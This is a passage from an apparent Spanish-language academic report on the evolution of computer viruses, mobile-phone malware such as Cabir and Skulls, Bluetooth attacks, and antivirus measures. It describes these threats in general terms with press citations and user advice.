Fred Cohen, el experto en seguridad que acuñase el término de “virus de

computadora” en 1983, dice que la naturaleza de los virus va a continuar
evolucionando. “Es poco probable que alguien vaya a crear un virus que pueda
diseminarse a todos los sistemas de computadoras en el mundo y destruir todo”,
dice. “Pero otros virus más avanzados serán capaces de dirigirse con más
precisión a su objetivo y tener mucha mayor longevidad.”. Cohen describe el virus
del futuro como aquel que, una vez introducido en el sistema, podría engendrar
subvariantes de sí mismo, que a su vez, volverían a engendrar sus propias
variantes, cada una de las cuales afectaría la computadora en diferentes formas.
La detección y eliminación de todos los retoños de un virus como éste, podría
llegar a resultar una tarea sumamente compleja.

Ya se han presentado tipos de virus avanzados que en su forma de actuar se

asemejan a los que se proliferarán en el futuro. Esta nueva variedad de la que los
recientes Bubbleboy y Kak son ejemplos vienen incorporados en el texto de un
correo electrónico y se activan sin necesidad de que el usuario tenga que abrir un
anexo. Como una combinación de virus y gusano, contiene un código HTML que
explota una vulnerabilidad que tienen los programas Outlook e Internet Explorer
5x. Una vez que se abre el mensaje de correo electrónico, el código incorporado
copia el virus dentro del sistema, y en el caso particular del Kak, dentro de la
carpeta donde inicia el Windows. La próxima vez que arranque el Windows, el
virus liberará su carga.

Algunas vulnerabilidades recientemente descubiertas en Outlook y Outlook

Express permitirían incluso a algunos virus avanzar un paso más allá, infectando
el equipo aun antes de que el usuario lea el mensaje electrónico que le ha sido
enviado. En la actualidad, no existe ningún virus de este tipo, pero un tipo de virus
como éste podría dispararse en el mismo instante en que la persona abra su
correo. Para este hueco de seguridad se puede descargar el parche para
subsanar esta deficiencia de Outlook en www.pcworld.com/downloads; pero más
vulnerabilidades de esta índole se pueden seguir presentando.

El futuro de los virus no reside en destruir datos, sino en capturarlos. El señor

Srivats Sampath, presidente y CEO de McAfee.com advierte: “Se verá un número
creciente de sitios maliciosos en la Web que tratarán de robar la información al
usuario mientras este se encuentre navegando en ella”. Algunos investigadores de
la propia McAfee afirman que ya han recibido numerosos informes de sitios que
auto descargan caballos de Troya capaces de enviar información hacia la fuente
que los originó, es decir, el propio autor.

73
Hasta ahora, las compañías dedicadas a la preservación de la seguridad y
privacidad en el mundo de la computación y la Web, no tienen solución aún para
este tipo de amenaza. Cierto software de protección anunciara cuando un sitio
está tratando de descargar algo hacia la PC del usuario, pero la mayoría de los
cortafuegos aun no son capaces informar cuando un sitio está extrayendo
información del equipo. Sin embargo la última versión del cortafuego y servicio de
privacidad personal de McAfee.com informa a los usuarios que están explorando
la Web cuando un sitio determinado está tratando de leer archivos o tomar
información (Miastkowski, 2005)41.

La novena edición (2004) del CSI/FBI Computer Crime and Security Survey,
indica como los ataques por virus y la negación de servicio, sobrepasaron las
pérdidas registradas por el robo de información; sólo los ataques por virus
alcanzaron unos $ 55 millones anuales según reportaron las 491 empresas
encuestadas (Figura 6).

Estas cifras revelan que hoy en día existe una mayor preocupación por detener las
consecuencias de estos programas que fueron creados inicialmente sin una
intención perniciosa, y que hoy en día representan un “dolor de cabeza” para los
responsables de mantener la operatividad y la seguridad de la información.

Figura 6. Pérdidas reportadas por incidentes de seguridad

Fuente: CSI/FBI 2004 Computer Crime and Security Survey (Espiñeira, 2005)23.

74
En los últimos años se ha notado una rápida evolución de los códigos maliciosos,
los cuales son capaces de infectar de diferentes formas y en diferentes
plataformas e incluso de defenderse y desactivar algunos productos antivirus. Es
por este motivo que también los antivirus han tenido que evolucionar para proteger
mejor la información que los usuarios guardan en sus computadoras.

En el 2004 surgieron ataques de diferente índole donde los antivirus no fueron

suficientes para proteger los datos contenidos en una PC y mucho menos en toda
una red empresarial, se ha tenido que agregar al sistema de seguridad un Firewall
para cada equipo a nivel de PC’s de escritorio, que evite la entrada de nuevos
códigos tales como: caballos de Troya, Spywares, y otros programas que intentan
acceder a la PC por diferentes puertos que permanecen abiertos de manera
predefinida.

El futuro de los virus en los próximos años puede estar enfocado a la llegada de
nuevo hardware móvil como tarjetas de memoria, computadoras de bolsillo y
teléfonos celulares con mayores opciones, parece ser que el nuevo objetivo de los
creadores de virus y códigos maliciosos en general será precisamente estos
nuevos dispositivos, como esta empezando a suceder en Europa en donde la
telefonía celular ha crecido en gran proporción.

De esta manera tenemos que el aumento de códigos a nivel de telefonía celular

pueda ser el mayor riesgo. Gusanos como Cabir.A pueden acrecentarse al
encontrarse abierto y disponible el código por parte de sus creadores. Lo que
alienta a otros programadores a crear nuevas versiones sin tanto trabajo.

La mejor forma para que el usuario este protegido es mantenerse al día sobre las
amenazas y riesgos de seguridad que van surgiendo en los equipos que se
tengan, además de obtener las últimas herramientas que se encuentren
disponibles por parte de los fabricantes (Saavedra, 2005)60.

Los virus de computadora podrían llegar a tener un gran alcance en la salud de

las personas ya que virus similares a los que hoy atacan a las computadoras
personales podrían en el futuro "enfermar" a aquellas partes del cuerpo humano
donde se utilicen implantes cibernéticos. Según la amenazadora visión del
profesor británico de cibernética Kevin Warwick publicada en "Globe and Mail”,
los hackers podrían de ésta manera tomar el control de partes del cuerpo humano
y aun del sistema nervioso de sujetos implantados (Gallo, 2005)27.

La telefonía IP está creciendo a un ritmo sin precedentes. Paralelamente aumenta

el interés de los intrusos informáticos por vulnerar los servicios VoIP. Un número
cada vez mayor de usuarios de Internet ha constatado las ventajas de la telefonía
IP. Sin embargo, la gran mayoría aún no se percata de los riesgos de seguridad a
los que está expuesta tal tecnología.

75
Al respecto, la compañía de seguridad informática Symantec previene que los
ataques de hackers contra sistemas de telefonía IP irán en aumento, a la par con
la propagación de tales sistemas (Diarioti, 2005)17.

Entre los métodos que podrían emplearse figuran:

- Audio-spam acústico que llenará el contestador automático con publicidad de

voz. Skype, por ejemplo, cuenta con un servicio de contestador automático.

- Phishing telefónico, en que se intenta inducir a los usuarios a proporcionar

información personal por teléfono.

- Manipulación del visor de identificación de llamadas. De esa forma, se

intentaría inducir a los usuarios a creer, por ejemplo, que está recibiendo una
llamada del banco.

-Secuestro de líneas telefónicas, que desviarán las llamadas a estafadores.

Aparte Symantec pronostica un renacer de una antigua forma de hacking. Los

intrusos realizarán miles de llamadas telefónicas al azar, hasta que responda un
número con señal digital. Entre tales números se buscan agujeros de seguridad en
servidores desprotegidos, con el fin de vulnerarlos (Diarioti, 2005)17.

7.1 EL SISTEMA OPERATIVO SYMBIAN

Muchas personas alrededor del mundo usan teléfonos celulares para establecer
una comunicación local o de larga distancia. Sin embargo, con los celulares de
recientes generaciones se tienen más servicios y aplicaciones: fotografía, video,
juegos multimedia, envío y recepción de correos electrónicos o mensajes
instantáneos, navegación en Internet, etc. Poco a poco, el teléfono celular se ha
transformado de un dispositivo de comunicación auditiva básica a virtuales centros
de entretenimiento y asistencia de información personal.

Un teléfono celular es un radio, muy sofisticado, pero en esencia un radio, como

un sintonizador de AM/FM. Como bien se conoce, el teléfono fue inventado en
1876 por Alejandro Graham Bell, y las comunicaciones sin cables o wireless
fueron desarrolladas por Nikolai Tesla en 1880 y formalmente presentadas, por el
italiano Guglielmo Marconi en 1894; en los últimos 20 años estas tecnologías se
han ido integrando en los celulares.

Para lograr las nuevas funcionalidades que tiene un teléfono celular se necesita
cierta inteligencia, además es indispensable contar con un sistema operativo.
Symbian es uno de los más importantes y funcionales, aunque existen otros como
Palm® que funciona en asistentes digitales personales (PDA, por sus siglas en
inglés), los cuales se hicieron populares por su interfaz que utiliza una pluma

76
electrónica y reconoce la escritura a mano en su pantalla; o Windows CE de
Microsoft®, una variante del sistema operativo Windows, que se integra a
diversos dispositivos electrónicos con mínima capacidad de almacenamiento,
incluyendo PDAs y teléfonos móviles (Rodríguez, 2005)59.

Symbian fue diseñado para integrarse fácilmente, con el software y el hardware

en dispositivos móviles. Los sistemas que utilizan Symbian pueden ser divididos
en cuatro categorías: serie 60, para teléfonos que el usuario maneja con una sola
mano; serie 80, para teléfonos con pantalla horizontal grande y teclado; serie UIQ,
para teléfonos que utilizan una pluma electrónica similar a los asistentes digitales;
y otros, para futuros desarrollos o que no están en las categorías anteriores.

Symbian es producto del trabajo conjunto de varias empresas líderes en telefonía

celular, como Nokia®, Ericsson®, Motorola® y Psion®, quienes fundaron esta
empresa en 1998 con el objeto de desarrollar un sistema operativo abierto para las
diversas plataformas de teléfonos móviles.

A diferencia de cualquier computadora, la programación de los teléfonos celulares

tiene sus limitaciones. Es por esto que Symbian está diseñado para residir en un
espacio muy pequeño, hacer un uso dinámico de escasos recursos de memoria,
administrar eficientemente la energía y soportar en tiempo real los protocolos de
comunicación y telefonía, además de ser más “gentil” con el usuario y tolerante a
fallos, en comparación con un sistema operativo de PC. Por ejemplo: cuando se le
quita la batería al teléfono mientras está encendido, el usuario esperaría que su
información se encuentre íntegra al volver a activarlo, y no frustrarse por el hecho
de que sus datos guardados se hayan perdido o peor: que el teléfono deje de
funcionar, porque el sistema operativo se dañó cuando ocurrió el corte de energía.

Técnicamente, el sistema operativo Symbian es una colección compacta de

código ejecutable y varios archivos, la mayoría de ellos son bibliotecas vinculadas
dinámicamente (DLL por sus siglas en inglés) y otros datos requeridos, incluyendo
archivos de configuración, de imágenes y de tipografía, entre otros recursos
residentes. Symbian se almacena, generalmente, en un circuito flash dentro del
dispositivo móvil. Gracias a este tipo de tecnología, se puede conservar
información aun si el sistema no posee carga eléctrica en la batería, además de
que le es factible reprogramarse, sin necesidad de separarla de los demás
circuitos.

Las aplicaciones compatibles con Symbian se desarrollan a partir de lenguajes de

programación orientados a objetos como C++, Java (con sus variantes como
PJava, J2ME, etc.), Visual Basic para dispositivos móviles, entre otros,
incluyendo algunos lenguajes disponibles en versión libre. La extensa variedad de
aplicaciones que se pueden desarrollar van desde administradores de archivos
hasta visualizadores de películas, guías de ciudades, mapas, diccionarios,
emuladores de juegos, por mencionar algunas.

77
Cada aplicación se puede instalar en el teléfono con la ayuda de una
computadora, una interfaz USB o Firewire, dependiendo del modelo de teléfono y
el cable correspondiente. Las aplicaciones se graban en la memoria flash del
teléfono dentro del proceso de sincronización de archivos, contactos y correos
electrónicos (Rodríguez, 2005)59.

Symbian es actualizable. Esta tarea la puede realizar el usuario, dependiendo del

modelo de su equipo, a través de los sitios en Internet de los fabricantes de
teléfonos o al obtener el disco compacto o tarjeta de memoria flash de los
distribuidores autorizados. Adicionalmente, Symbian proporciona una interfaz
gráfica fácil de comprender, llena de íconos y opciones, con lo cual se evita que el
usuario deba de aprender manuales inmensos para explotar las capacidades del
equipo de comunicación móvil.

Sin embargo, Symbian también es vulnerable a los virus que afectan a

computadoras personales y asistentes digitales (PDA). La manera más común de
contagio es cuando el aparato está en comunicación con algún otro dispositivo
contaminado en la red local (si el teléfono es compatible con la norma IEEE
802.11) o en la una red personal (si es compatible con Bluetooth). Pero menos
frecuente es la infección por mensajes cortos (MMS); sin embargo, estos virus
pueden bloquear aplicaciones e incluso el sistema de archivos, no obstante,
también hay métodos para prevenirlos y eliminarlos instalando programas
antivirus. Por otra lado, Symbian contiene una muy variada y extensa colección
de bibliotecas para implementar muchos de los estándares de la industria de
teléfonos de generación 2, 2.5 y 3. En la capa de software de sistema, en su
versión 6, incluye soporte de distintos servicios (Tabla 1).

Tabla 1. Capa de Software

Servicios Protocolos
Redes TCP/IP, SSL, FTP, etc.
Comunicaciones Bluetooth, WiFi
Navegadores de Internet HTML, HTTPS, WAP
GSM, GPRS, CDMA2000,
Telefonía
EDGE, WCDMA
Multimedia WAV, JPEG, MP3, etc.

En la Tabla 1, se puede ver que Symbian es un sistema muy completo, diseñado

prácticamente para cualquier dispositivo móvil. Además de la gran comunidad de
desarrolladores que trabajan en este sistema, su plataforma abierta permite la
instalación de una gran variedad de programas que poco a poco mejorarán su
funcionamiento, a favor de la versatilidad de las comunicaciones personales
(Rodríguez, 2005)59.

78
7.2 LOS VIRUS EN CELULARES

El sueño de un mundo conectado en el que los ordenadores personales y los

teléfonos móviles puedan comunicarse con los hogares digitales así como con
otros dispositivos prometen hacer la vida más fácil pero puede convertirse en una
pesadilla, ya que podría hacer que la vida fuera más peligrosa si los
desarrolladores de software maligno encuentran la manera.

No se habla sólo de perder el número de la tarjeta de crédito, ya que, en la medida

en que los microchips y el software están cada vez más presentes en nuestra
vida diaria, como en coches, casas y teléfonos móviles, las amenazas se
multiplican.

De hecho, los primeros programas conocidos, aunque simples, son un “buen”

comienzo. Los servicios móviles de algunos países permiten ver a los usuarios
qué está pasando dentro de sus hogares vía webcam, que envía las imágenes
por Internet a cualquier dispositivo. Pero esta misma webcam puede ser empleada
por un pirata para ver si hay alguien en casa o para violar la intimidad de las
personas. En un futuro, podría incluso darse la situación de que un hacker
accediera al teléfono móvil de una persona mientras conduce para bloquearle los
frenos del coche.

Además, algunos expertos en seguridad consideran que al mismo tiempo que se

incrementa la seguridad en ordenadores y servidores, crecen las amenazas en la
seguridad individual y de los pequeños dispositivos. De hecho, estas mismas
fuentes creen que los teléfonos 3G serán el próximo objetivo a abatir por parte de
los delincuentes informáticos.

Una prueba más de esta tendencia son los datos que facilita la compañía de
seguridad F-Secure, quien ya ha detectado 87 programas malignos para móviles,
la mayoría de ellos (82 de los 87 programas) tenían como objetivo el sistema
operativo serie 60 de de Symbian. Sin embargo, esto se debe a que es el sistema
más popular, no a que este sea el más inseguro (Herranz, 2005)32.

Cabir es un virus que apareció en los celulares en España en el Mundial de

Atletismo de Helsinki, entra en los teléfonos a través de un mensaje y se reenvía
solo. Mensajes que esconden códigos maliciosos han empezado a irrumpir en los
móviles. Aunque en un principio no se detectan anomalías, el virus se instala en el
teléfono para siempre.

Nokia, ha sido el caldo de cultivo con el cual se han reproducido estos virus
informáticos que afecta a los móviles. El número de afectados puede ser sólo de
unas docenas de terminales, pero la cifra no deja de ser importante. Según
portavoces de la operadora TeliaSonera, el código dañino se ha extendido en un
corto periodo de tiempo.

79
Cabir se detectó por primera vez en junio del 2004. Este aprovecha la conexión
Bluetooth que incorporan los teléfonos de última generación para expandirse
(Muñoz, 2005)51.

Esto hace que se limite su capacidad de propagación a los terminales que se

encuentran a una distancia máxima de 10 metros. Pero en un espacio donde la
gente se encuentra tan apretada como en un estadio, esto no parece un
obstáculo.

El usuario del teléfono móvil afectado recibe por esta vía un mensaje en el que se
le pide que descargue un programa, si lo hace y lo instala, resultará infectado. El
virus se dedicará entonces a reenviarse a otros móviles hasta agotar la batería del
aparato infectado (Muñoz, 2005)51.

7.2.1 Troyanos en celulares. Hace un tiempo, el pensar que un código maligno

(un troyano por ejemplo), pudiera atacar a un teléfono celular, podría ser algo poco
creíble. El envío de un simple mensaje SMS (un correo electrónico recibido en un
celular), podría bloquear el equipo, e impedir que este siga funcionando.

En una conferencia de hackers pertenecientes al grupo sombrero negro (Black

Hat), un investigador de origen holandés, demostró que con la sencilla
modificación de un programa ya existente, se puede enviar un mensaje SMS
modificado maliciosamente, desde cualquier computadora conectada a Internet, y
bloquear el celular que lo recibe.

Esto fue demostrado en los modelos de telefonía celular Nokia 6210, 3310 y 3330,
pero no se descarta afecte a modelos de otros fabricantes, ya que simplemente no
se han efectuado pruebas con ellos todavía. Si el celular recibe el mensaje, el
teléfono literalmente "se cuelga", y es imposible que este vuelva a encender. La
clave del contagio esta en la manipulación y modificación malintencionada del
titulo de la información enviada (técnicamente la llamada User Data Header).

La solución definitiva al problema, pasa por el cambio de la tarjeta SIM

incorporada en el celular, por una nueva que no sea susceptible a la falla, o el
cambio por un nuevo modelo. Los mensajes maliciosos pueden ser borrados
desde una PC con el software adecuado. Sin embargo, adaptar el ataque a
diferentes modelos de celulares, requiere por parte del atacante, amplio
conocimiento de los diferentes protocolos.

Nokia no se sorprende que el bloqueo pueda ocurrir (ya que parece suceder por si
solo en contadas ocasiones), pero si confesó no conocer que se pudiera hacer en
forma premeditada como se demostró en la conferencia (Vsantivirus, 2005)70.

80
Pero en septiembre del 2005, aparecieron nuevos virus como el Commwarrior. B
y Skulls que funcionan de modo distinto al Cabir, pues son Troyanos que se
filtran en los celulares camuflados en otros programas aparentemente inofensivos.
Commwarrior. B entra con el programa Doomboot.A y se le atribuye potencial
para extenderse mediante mensajes multimedia; aunque realmente no ha
conseguido autoenviarse en ninguno de los casos detectados en celulares, por lo
que su efecto más nocivo es la brusca descarga de la batería. También es
exclusivo de los celulares con el sistema operativo Symbian. En este caso no hay
acuerdo sobre su foco de infección: mientras algunos expertos se inclinan por la
posibilidad del Bluetooth como vía, otros apuntan a la descarga de juegos Java
para móvil desde Internet.

Si bien Skull es mucho más nocivo, entre sus funciones no está el propagarse de
móvil a móvil, pero se propaga al descargarse desde la red. Skull se encuentra en
algunas páginas de software para Symbian, donde aparece camuflado bajo la
frase Extended Theme Manager para el modelo Nokia 7610. En realidad se trata
de un Troyano nocivo que desactiva aplicaciones internas del teléfono como
mensajería, agenda o navegación Web y las cambia por versiones que no
funcionan. Actúa cambiando los iconos de las distintas funciones por una calavera.
De este modo, el celular infectado deja de ser útil y queda trabajando para solo
efectuar y recibir llamadas telefónicas (Consumer, 2005)13.

7.2.2 Cómo neutralizar los ataques. Existen numerosas páginas donde se

explica cómo actuar en caso de que un móvil sea infectado por un virus.

Cabir: El organismo estatal red.es tiene a disposición del usuario una página de
alerta anti-virus donde se explica el modo de operar en caso de ataque por Cabir.

Commwarrior. B: La empresa finlandesa F-Secure ya ha comenzado a

comercializar el anti virus que combate Commwarrior. B. De todos modos, se
puede descargar una versión gratuita de prueba hábil durante treinta días.

Skulls: Donde también F-Secure permite descargar el contra esta amenaza.

(Consumer, 2005)13.

7.2.3 Seguridad en los celulares. La seguridad en los teléfonos móviles está en

la agenda de la mayoría de los operadores de telefonía móvil en todo el mundo,
aun cuando los consumidores no se lo han pedido. Sonera, unidad finlandesa del
operador nórdico TeliaSonera, así como y sus rivales en la tierra de origen del
gigante de la telefonía móvil Nokia han estado entre las primeras empresas de
telefonía móvil en optar por software de seguridad.

81
Tuukka Toivonen, jefe de cuentas empresariales de la operadora finlandesa Elisa,
comenta que "en el lado empresarial, la demanda está ya ahí. Los gerentes de
tecnologías de la información han comprendido el asunto. Pero para los
consumidores es todavía demasiado agresivo". (El PAIS, 2005)22.

"En los teléfonos ‘inteligentes', la cuestión de la seguridad de los datos es similar a

la que se tiene en los computadores personales hoy en día", afirma, añadiendo
que el software de seguridad, "un requisito necesario" para los teléfonos móviles
dentro de cinco años.

F-Secure, líder del mercado mundial en seguridad de telefonía móvil, ha ganado

cinco de los ocho contratos promulgados por los operadores, y espera generar
beneficios de su negocio de telefonía móvil entre 2006 y 2008. Además de Elisa y
Sonera, tiene contratos con la Swisscom y con la unidad móvil de Deutsche
Telekom, T-Mobile, en Alemania. Orange, una unidad de France Telcom, está
dirigiendo este servicio en Suiza.

El productor de software de seguridad estadounidense McAfee a anunciado que

esperaba que los productos de seguridad para móviles comenzasen a generar
ganancias lentamente el próximo año y contribuir más en 2007.

"Algunos operadores han elegido buscar software antivirus para móviles y crear
nuevas empresas. La gran mayoría, sin embargo, están satisfechos
desplazándose más cautelosamente", comentó Aaron Davidson, consejero
delegado de Simworks, la empresa de antivirus con base en Nueva Zelanda. "A
pesar de la creencia popular, la mayoría de los operadores se mueven lentamente
y bajo mi punto de vista, el mero hecho de que estén interesados en evaluar las
soluciones es un gran paso adelante".

Para proveer mayor seguridad a los usurarios de telefonía móvil los celulares que
se vendan a finales del segundo semestre del 2006 podrían ser mucho más
seguros que los actuales, gracias a un nuevo estándar de seguridad cuya
especificación final está prevista para la primera mitad del año próximo

El nuevo estándar de securización de dispositivos móviles está siendo

desarrollado por Trusted Computing Group (TCG), asociación en la que
participan fabricantes de las dimensiones de Motorola, Nokia y Samsung, y que
ya cuenta en su haber con otras normas de seguridad para PC, servidores y
redes. En la conferencia Cellular Telecommunications & Internet Association
Wireless IT & Entertainment que se celebra en San Francisco, TCG lanzó un
documento en el que se definen los escenarios de uso del nuevo estándar, como
el bloqueo de los terminales en caso de pérdida, la gestión de parches y
actualizaciones de software, y los pagos seguros por el móvil.

82
Según Roger Kay, miembro del consejo asesor de TCG, aunque todavía queda
mucho trabajo por delante antes de finalizar el estándar, “ya se han detallado las
áreas que cubrirá y el calendario para su desarrollo”. De acuerdo con los planes
de la asociación, se espera que la especificación esté públicamente disponible en
la primera mitad de 2006. Así, los primeros productos que soporten el nuevo
estándar de seguridad podrían aparecer en el mercado a finales de este año (El
PAIS, 2005)22.

7.2.4 Hackers en los celulares. Los hackers se pueden aprovechar de los

calendarios, las listas de contactos y otra información personal, o convertir el
celular en un dispositivo para escuchar las conversaciones sin que estos sean
descubiertos. Los virus de los móviles pueden dejar un móvil completamente
inhabilitado. Pocos usuarios de teléfonos móviles han resultado realmente
dañados por estos huecos de seguridad. Pero los expertos dicen que las
amenazas son más serias con la aparición de los celulares que funcionan como
pequeños ordenadores capaces de comunicarse de diversas maneras.

"Hay un gran número de dispositivos vulnerables los cuales ya se están usando, e

inevitablemente esto afectará a los propietarios de esos dispositivos", dicho por
Adam Laurie, en una entrevista realizada por e-mail, quien es experto en
seguridad y quien ha revelado ya varios agujeros de seguridad.

Debido a que proveedores como Cingular mantienen un duro control en las redes,
los usuarios han evitado los Spam, el espionaje y otras molestias que afectan a
los usuarios de ordenadores. Pero esto no quiere decir que sean inmunes a otras
amenazas.

Laurie demostró que podía copiar los calendarios y las listas de contacto de 46
diputados británicos y convertir sus teléfonos en un perfecto dispositivo para
escuchar todas sus conversaciones. Laurie fue capaz de hacer uso de sus
teléfonos usando el Bluetooth, una tecnología inalámbrica de corto alcance
incluida en la mayoría de los nuevos teléfonos y que permite a los usuarios
distribuirse los unos a los otros la información de los contactos, hablar a través de
la radio del coche y conectarse con un ordenador sin necesidad de cables
(IBLNEWS, 2005)34.

En la conferencia de "Hack in the Box", realizada en la capital de Malasia, los

asistentes fueron testigos de una demostración sobre los defectos de seguridad
encontrados en Java 2 Micro Edition o J2ME, software desarrollado por Sun
Microsystems y que se encuentra presente en los terminales de nueva
generación de Nokia, Sony Ericsson y Motorola, entre otros.

La vulnerabilidad del software, que viene incluído en teléfonos "inteligentes"

fabricados por estas compañías, está relacionada con la manera en que Java trata
de evitar que el sistema operativo acepte órdenes desde el exterior.

83
"La nueva generación de teléfonos en realidad viene con un software mucho más
poderoso dentro del sistema operativo", declaró Dylan Andrew, el organizador del
encuentro. "Hemos encontrado nuevos ataques que afectan a éstas nuevas
plataformas y que permiten al atacante, por ejemplo, tomar el control del teléfono
celular en forma remota, quizás leer la agenda de direcciones o escuchar
secretamente un conversación”. (Noticiasdot, 2005)52.

A medida que aumenta el número de teléfonos móviles en manos de los usuarios,

se incrementan los blancos para una nueva oleada de delincuentes virtuales
(Noticiasdot, 2005)53.

Más que el temor ante la aparición de virus para celulares, los expertos están
preocupados por el surgimiento de prácticas de hackeo, conocidas como
BlueSnarfing y BlueSniping, las cuales aprovechan serias vulnerabilidades
encontradas en la tecnología Bluetooth para acceder y capturar la información
almacenada en los teléfonos celulares que cuentan con esta tecnología
inalámbrica.

Para el BlueSnarfing se utiliza un programa creado por hackers ingleses que

corre en un notebook convencional con interfaz Bluetooth, con el cual es posible
capturar la información de los celulares vulnerables, el cual puede ser usado para
espionaje corporativo. Así, los teléfonos pueden ser atacados remotamente para
acceder y capturar la información contenida en los equipos, como la agenda de
contactos, números telefónicos, citas o notas de calendario, incluso mensajes de
texto. Los teléfonos son vulnerables cuando están en modo “visible”, es decir, con
la funcionalidad Bluetooth disponible.

Entre las posibilidades que ofrece a un usuario malicioso, figuran el "acceder al

teléfono vulnerable para respaldar todos sus datos. En un caso extremo, es
posible discar remotamente una llamada saliente desde el teléfono accesado, sin
que el dueño del teléfono se de cuenta, para escuchar su conversación en forma
secreta”.

Las manifestaciones de estas vulnerabilidades permiten ataques de espionaje

electrónico que comprometen la confidencialidad de la información, y deben ser la
preocupación principal de los usuarios de estos teléfonos. En este caso, se suma
el hecho de que los ejecutivos importantes y las autoridades suelen utilizar este
tipo de aparatos de tecnología High End, por sus prestaciones como gran
capacidad de almacenamiento de datos, conectividad inalámbrica y agendas
electrónicas incorporadas.

Norman Bennett, gerente general de Symantec, expresa que “en la medida que
los dispositivos móviles se convierten cada vez más en una necesidad y aumenta
el número de usuarios, son mayores las oportunidades para Hackers y otro tipo de
conductas maliciosas. La lista ataques a dispositivos móviles crece rápidamente y

84
aunque aún no han tenido una propagación masiva, sí se han identificado varios
en sistemas operativos como Pocket PC y Symbian, junto con algunas
debilidades de la tecnología Bluetooth y es por esto que existe una preocupación
al respecto, tanto por parte de los fabricantes de los dispositivos como de las
empresas de seguridad”.

Se podría pensar que los usuarios móviles y los administradores de sistema de

redes inalámbricas encontrarán, en el corto plazo, los mismos tipos de amenazas
contra sus sistemas móviles que las existentes en los equipos conectados por
cable. Según Bennett, “hay que entender que hoy nos enfrentamos a tecnologías
integradas, sistemas compartidos y lenguajes comunes, y hay que manejar esa
convergencia tecnológica de forma integral, sin importar el soporte (Noticiasdot,
2005)53.

Las amenazas contra los sistemas inalámbricos están evolucionando casi a la

misma velocidad con la que aparecen estas tecnologías en el mercado y es por
eso que es necesario que tanto los usuarios como los proveedores de servicios
estén alerta ante estas nuevas amenazas. Estamos en un excelente momento
para pensar en la tecnología inalámbrica y sus ventajas, sin embargo hay que
estar conscientes de que la seguridad tiene necesariamente que ser la piedra
angular”.

Respecto del inminente aumento en los ataques a celulares por parte de hackers,
Darío Bengoechea, Country Manager de Afina, señala que “para entender esto
hay que pensar que los celulares se constituyen en el blanco de los hackers, en la
medida en que se han ido masificando en todo el mundo e integrando nuevas
funcionalidades de las redes inalámbricas de voz y datos. Desde este punto de
vista, lo más probable es que en el futuro cercano sigamos viendo nuevos virus
que infecten a celulares, especialmente a aquellos que tengan funcionalidades
anexas de mensajería y conectividad vía Bluetooth, entre otras. No se trata de
una situación alarmante por ahora, pero que sí debe ser conocida por los
usuarios”.

Muchos usuarios de teléfonos móviles se preguntan si estas amenazas son un

tema para preocuparse. En ese sentido, Bengoechea afirma que “es un tema para
preocuparse pero no más de lo que acontece en otros países. El primer virus para
celulares detectado hace algún tiempo reunía condiciones muy específicas, como
contar con el sistema operativo Symbian, que en Europa tiene una alta
penetración y poseer conectividad Bluetooth, es decir, un universo acotado, pero
no por eso insignificante. Recordemos que IDC considera que en el 2006 el 80%
de los teléfonos móviles contará con tecnología Bluetooth. En tal sentido, tal
como aconteció con los PCs o ha ocurrido con los asistentes personales digitales,
será la propia industria la encargada de encontrar soluciones e informar a los
usuarios”.

85
Respecto de las recomendaciones o medidas preventivas que debieran tomar los
usuarios de móviles para evitar ser blanco de estos ataques, los expertos
coinciden en que los usuarios deben conocer las capacidades y aplicaciones de
los teléfonos que utilizan. Bengoechea, Country Manager de Afina, señala que “en
el caso de amenazas de virus, deben informarse sobre las condiciones y
cualidades técnicas de el celular, para saber si los modelos que se usan han sido
atacados por algún virus o similares. Segundo, en caso de estar dentro de los
probables modelos que sufran ataques, buscar la forma de desactivar las
funcionalidades que puedan facilitar el contagio en caso de encontrarse en un
probable foco de virus”.

Por otro parte para evitar ataques de hackers, el consultor de Seguridad de

NEOSECURE, Cristóbal Soto, indica que “las principales medidas preventivas que
debe tomar el usuario son ser conservador al momento de decidir la instalación de
una nueva aplicación en el teléfono, sobre todo si se baja de Internet y ser
cuidadoso en el uso de tecnologías inalámbricas como Bluetooth, activándolas
sólo en el momento que se va a utilizar” (Noticiasdot, 2005)53.

7.2.5 Antivirus para los celulares. Empresas como F-Secure Mobile Anti-
Virus ya ofrecen al mercado de la telefonía celular protección contra contenido
malicioso, Ya que han aparecido los primeros virus y ya es posible crear código
malicioso que dañe el teléfono hasta el punto de impedirte utilizarlo. Un virus
puede causar una facturación falsa, divulgación de información almacenada,
borrado, modificado o datos corruptos las funciones principales del antivirus son:

- Protección transparente en tiempo real contra contenido malicioso en el

dispositivo y en tarjetas de memoria.

- Actualización automática de base de datos desde F-Secure Anti-Virus

Research a las terminales móviles por HTTPS o por medio de mensajes SMS.

- Detección automática de conexiones GPRS desde la terminal para

actualizaciones.

- Bases de datos antivirus firmadas digitalmente.

La aplicación soporta los siguientes idiomas: ingles, finlandés, francés, alemán,

italiano y español, es compatible con Nokia 6600, 6630, 6670, 6680, 7610, 6260 y
3230, y exige como requisitos de sistema:

- 850 KB de espacio libre en memoria interna.

- Conexión a Internet (F-Secure Corporation, 2005)26.

86
7.2.6 Virus para celulares que afectan a PCs.

El Troyano Cardtrap.A, un código malicioso que ataca teléfonos basados en el

sistema operativo Symbian, sería el primer virus de este tipo capaz de "saltar" a
un computador, según informa la firma F-Secure. Es una amenaza informática de
baja peligrosidad pero precursora de virus más sofisticados, el Troyano
Cardtrap.A, uno de los primeros con la potencialidad de atacar tanto a celulares
como computadores.

El Cardtrap.A, que afecta a teléfonos móviles basados en el sistema operativo

Symbian, este copia también dos gusanos (el Win32/Padobot.Z y el
Win32/Rays) en la tarjeta de memoria de un celular afectado, los cuales pueden
ser activados por el usuario al ejecutarlos en un PC.

Debido a que requiere de la acción del usuario y a que no afecta a cualquier

versión de Windows, el gusano es descrito como de baja peligrosidad por F-
secure. En cualquier caso, ejecutivos de la firma llamaron la atención sobre el
creciente volumen de códigos infecciosos dirigidos a dispositivos móviles para los
cuales ya se han detectado 83 nuevos virus (Mouse, 2005)50.

7.3 VIRUS EN LINUX

Los virus pueden ser una amenaza en Linux. Existen varios. Lo que es cierto es
que un virus en Linux no encontrará un lugar fructífero para propagarse. Primero
el código del virus se debe ejecutar en ella. Lo que significa que se ha copiado un
ejecutable corrupto desde otro sistema. En el mundo Linux, la práctica común es
el pasar una aplicación a otro usuario dándole la URL donde se encuentra el
software en lugar de enviar archivos ejecutables. Es decir, el virus viene de un sitio
oficial, donde se puede detectar rápidamente. Una vez que una máquina se ha
infectado, para conseguir extender el virus, este debería usarse como una
plataforma de distribución para aplicaciones precompiladas, lo que es muy
